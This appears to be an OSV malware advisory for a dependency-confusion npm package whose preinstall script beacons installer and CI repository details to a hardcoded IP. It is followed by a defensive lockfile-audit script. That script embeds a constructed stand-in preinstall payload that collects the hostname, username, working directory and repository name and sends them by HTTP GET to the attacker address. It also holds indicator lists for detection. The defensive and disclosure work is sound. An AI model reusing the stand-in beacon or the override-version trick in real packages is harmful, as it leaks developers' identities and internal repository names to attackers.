pewter-constantstest @9999.0.0
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID
MAL-2026-4638
Ecosystem
npm
Summary
On npm install, the preinstall script callback.js collects the installer's hostname, OS username, current working directory, npm registry configuration, and CI repository identifiers read from a broad list of CI environment variables (GITHUB_REPOSITORY, CI_PROJECT_PATH, BUILD_REPOSITORY_NAME, BITBUCKET_REPO_FULL_NAME, TRAVIS_REPO_SLUG, DRONE_REPO, BUILDKITE_PIPELINE_SLUG, CIRCLE_PROJECT_REPONAME, JOB_NAME), then transmits them in a plaintext HTTP GET to the hardcoded URL http://75.119.137.232:31337/depconfuse (a bare IP address, no hostname). Because the request is unencrypted, the beacon and its payload are visible to egress monitoring. The package has no functional surface: index.js exports an empty object, the description is the generic "Shared utility helpers.", the README is 48 bytes, and the version is 9999.0.0, the canonical dependency-confusion override version chosen to win resolution against an internal package of the same name. The package exists solely to fire the beacon when an organization accidentally resolves this public name in place of a private/internal package, leaking the victim's identity and internal repository names to the attacker for follow-on targeting.
Source: amazon-inspector (050b19d8dad7c8c1a626c953493c23b375e434128f38950625f82b0fb244eabe)
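As an added example (not part of the OSV record and not the package's own code), the following Node.js script audits a parsed package-lock.json (lockfileVersion 2 or 3, which exposes a "packages" map with "version", "resolved" and "hasInstallScript" fields) for the three indicators this report describes: a 9999.x override version, an internal package name resolved from the public registry, and a lifecycle install script. It also runs a heuristic over a lifecycle script's source for reads of the CI repository variables listed above combined with a URL pointing at a bare IP address. The list of internal package names is an assumed input, and both the lockfile fragment and the preinstall script below are constructed for illustration; the script is a stand-in with the reported behaviour, not the real callback.js.

```javascript
// Added example: audit a package-lock.json and a lifecycle script for the
// dependency-confusion indicators described in MAL-2026-4638.

// Indicators taken from the report.
const CI_REPO_VARS = [
  'GITHUB_REPOSITORY', 'CI_PROJECT_PATH', 'BUILD_REPOSITORY_NAME',
  'BITBUCKET_REPO_FULL_NAME', 'TRAVIS_REPO_SLUG', 'DRONE_REPO',
  'BUILDKITE_PIPELINE_SLUG', 'CIRCLE_PROJECT_REPONAME', 'JOB_NAME',
];
const BEACON_URL = 'http://75.119.137.232:31337/depconfuse';
const PUBLIC_REGISTRY = 'https://registry.npmjs.org/';

// Audit a parsed lockfile (lockfileVersion 2/3 "packages" map).
// `internalNames` is the organisation's list of private package names (assumed input).
function auditLockfile(lock, internalNames = []) {
  const findings = [];
  const internal = new Set(internalNames);
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    if (path === '') continue; // the root project entry, not a dependency
    // Derive the package name from the last node_modules/ segment (handles nesting and scopes).
    const name = entry.name || path.slice(path.lastIndexOf('node_modules/') + 'node_modules/'.length);
    if (/^9999\./.test(entry.version || '')) {
      findings.push({ name, reason: 'dependency-confusion override version', detail: entry.version });
    }
    if (internal.has(name) && (entry.resolved || '').startsWith(PUBLIC_REGISTRY)) {
      findings.push({ name, reason: 'internal name resolved from public registry', detail: entry.resolved });
    }
    if (entry.hasInstallScript) {
      findings.push({ name, reason: 'package runs a lifecycle install script', detail: entry.version });
    }
  }
  return findings;
}

// Heuristic scan of a lifecycle script's source: which CI repository variables it
// references, and whether it addresses a URL by bare IP address.
function scanLifecycleScript(source) {
  const ciVars = CI_REPO_VARS.filter((v) => source.includes(v));
  const bareIpUrls = source.match(/https?:\/\/\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?[^\s'"`]*/g) || [];
  return {
    ciVars,
    bareIpUrls,
    knownBeacon: bareIpUrls.includes(BEACON_URL),
    suspicious: ciVars.length > 0 && bareIpUrls.length > 0,
  };
}

// Constructed lockfile fragment: an internal name ("acme-shared-helpers") that
// has been resolved from the public registry at the 9999.0.0 override version.
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'acme-app', version: '1.0.0' },
    'node_modules/acme-shared-helpers': {
      version: '9999.0.0',
      resolved: 'https://registry.npmjs.org/acme-shared-helpers/-/acme-shared-helpers-9999.0.0.tgz',
      hasInstallScript: true,
    },
    'node_modules/left-pad': {
      version: '1.3.0',
      resolved: 'https://registry.npmjs.org/left-pad/-/left-pad-1.3.0.tgz',
    },
  },
};

// Constructed stand-in for a preinstall script with the reported behaviour
// (NOT the package's actual callback.js).
const SAMPLE_SCRIPT = `
const os = require('os'), http = require('http');
const repo = process.env.GITHUB_REPOSITORY || process.env.CI_PROJECT_PATH || '';
const q = new URLSearchParams({ h: os.hostname(), u: os.userInfo().username, cwd: process.cwd(), repo });
const u = new URL('http://75.119.137.232:31337/depconfuse');
u.search = q;
http.get(u, () => {});
`;

console.log(auditLockfile(SAMPLE_LOCK, ['acme-shared-helpers']));
console.log(scanLifecycleScript(SAMPLE_SCRIPT));
```

In a CI pipeline, feed the real lockfile with JSON.parse(fs.readFileSync('package-lock.json')) and fail the build on any finding. The internal-name check is the one that catches this class of package even when the attacker picks a more modest version number, so keep that list complete; the bare-IP heuristic is a triage aid, not proof, and a match should prompt reading the script rather than acting on it alone.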